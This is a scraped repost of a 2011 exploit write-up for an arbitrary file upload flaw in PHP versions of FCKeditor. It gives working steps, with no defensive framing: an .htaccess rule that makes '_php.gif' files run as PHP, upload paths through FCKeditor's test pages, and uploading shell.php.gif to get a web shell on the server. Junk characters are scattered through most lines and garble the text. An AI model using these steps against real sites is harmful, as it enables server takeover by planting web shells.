FCKeditor所有php版本Upload上传漏洞
% ~. Y, ~& Q8 L作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07' r# m% k+ r8 B+ o, W
减小字体 增大字体
* e! _5 @6 N( C$ L. V[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
3 l& J' v5 z% ]# ~7 n3 @[+] Date: 2011
! j9 T3 X2 L0 J; e[+] Author : sinesafe.cn1 W3 {/ V; U. n8 \5 u
[+] Website : WwW.sinesafe.cn
2 e* s4 |% F% G/ R———————————————————
) L! r q5 q4 R6 M; @1.create a htaccess file:
D5 R& \1 t+ J, b& Scode:+ W9 D6 ^2 T: z
<FilesMatch “_php.gif”> R" d0 r7 S& H F& f, b: F: T( c
SetHandler application/x-httpd-php0 j; L2 M& O+ Z2 m
</FilesMatch>7 A/ K$ \) h" e# x
( y% x9 t, n P7 z$ k) Z$ f
2.Now upload this htaccess with FCKeditor.1 w0 a* k* e: d3 R9 V9 F" W
7 \8 z u" q) V: c# a5 P1 I( _
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
( `& A1 S7 \8 p' _$ q1 B! K" n& x) J; X R% @* w( J) M; [. u
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
2 ^8 Y3 ?) W+ \( E! I- T2 b% q x% c4 R
———————————————————————————————-+ n. E% N$ h4 r+ O) R! v
3.Now upload shell.php.gif with FCKeditor.
1 @* \- o" R, p4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
9 _1 S: ~3 E3 c6 P0 z2 x c8 K5.http://www.sinesafe.cn/anything/shell_php.gif
. _5 l8 `6 I5 J; B# [ i8 o6.Now shell is available from server. | # K. n0 X7 }" i* V! x7 F, F- M
, N. j' x- w5 g2 m; H
0 a3 _1 b. Z8 v' O |